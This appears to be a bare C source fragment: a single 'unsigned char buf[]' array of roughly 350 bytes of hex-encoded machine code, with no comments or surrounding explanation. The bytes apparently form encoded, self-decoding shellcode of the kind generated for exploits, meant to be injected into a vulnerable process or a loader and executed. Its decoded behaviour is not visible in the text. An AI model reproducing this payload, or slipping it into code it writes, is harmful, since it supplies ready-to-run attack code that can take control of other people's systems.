unsigned char buf[] = 
"\xdb\xd8\xb8\xea\xf2\x2d\x71\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x52\x83\xed\xfc\x31\x45\x13\x03\xaf\xe1\xcf\x84\xd3\xee\x92"
"\x67\x2b\xef\xf2\xee\xce\xde\x32\x94\x9b\x71\x83\xde\xc9\x7d"
"\x68\xb2\xf9\xf6\x1c\x1b\x0e\xbe\xab\x7d\x21\x3f\x87\xbe\x20"
"\xc3\xda\x92\x82\xfa\x14\xe7\xc3\x3b\x48\x0a\x91\x94\x06\xb9"
"\x05\x90\x53\x02\xae\xea\x72\x02\x53\xba\x75\x23\xc2\xb0\x2f"
"\xe3\xe5\x15\x44\xaa\xfd\x7a\x61\x64\x76\x48\x1d\x77\x5e\x80"
"\xde\xd4\x9f\x2c\x2d\x24\xd8\x8b\xce\x53\x10\xe8\x73\x64\xe7"
"\x92\xaf\xe1\xf3\x35\x3b\x51\xdf\xc4\xe8\x04\x94\xcb\x45\x42"
"\xf2\xcf\x58\x87\x89\xf4\xd1\x26\x5d\x7d\xa1\x0c\x79\x25\x71"
"\x2c\xd8\x83\xd4\x51\x3a\x6c\x88\xf7\x31\x81\xdd\x85\x18\xce"
"\x12\xa4\xa2\x0e\x3d\xbf\xd1\x3c\xe2\x6b\x7d\x0d\x6b\xb2\x7a"
"\x72\x46\x02\x14\x8d\x69\x73\x3d\x4a\x3d\x23\x55\x7b\x3e\xa8"
"\xa5\x84\xeb\x7f\xf5\x2a\x44\xc0\xa5\x8a\x34\xa8\xaf\x04\x6a"
"\xc8\xd0\xce\x03\x63\x2b\x99\xeb\xdc\x0b\x3c\x84\x1e\x6b\xaf"
"\x08\x96\x8d\xa5\xa0\xfe\x06\x52\x58\x5b\xdc\xc3\xa5\x71\x99"
"\xc4\x2e\x76\x5e\x8a\xc6\xf3\x4c\x7b\x27\x4e\x2e\x2a\x38\x64"
"\x46\xb0\xab\xe3\x96\xbf\xd7\xbb\xc1\xe8\x26\xb2\x87\x04\x10"
"\x6c\xb5\xd4\xc4\x57\x7d\x03\x35\x59\x7c\xc6\x01\x7d\x6e\x1e"
"\x89\x39\xda\xce\xdc\x97\xb4\xa8\xb6\x59\x6e\x63\x64\x30\xe6"
"\xf2\x46\x83\x70\xfb\x82\x75\x9c\x4a\x7b\xc0\xa3\x63\xeb\xc4"
"\xdc\x99\x8b\x2b\x37\x1a\xab\xc9\x9d\x57\x44\x54\x74\xda\x09"
"\x67\xa3\x19\x34\xe4\x41\xe2\xc3\xf4\x20\xe7\x88\xb2\xd9\x95"
"\x81\x56\xdd\x0a\xa1\x72";
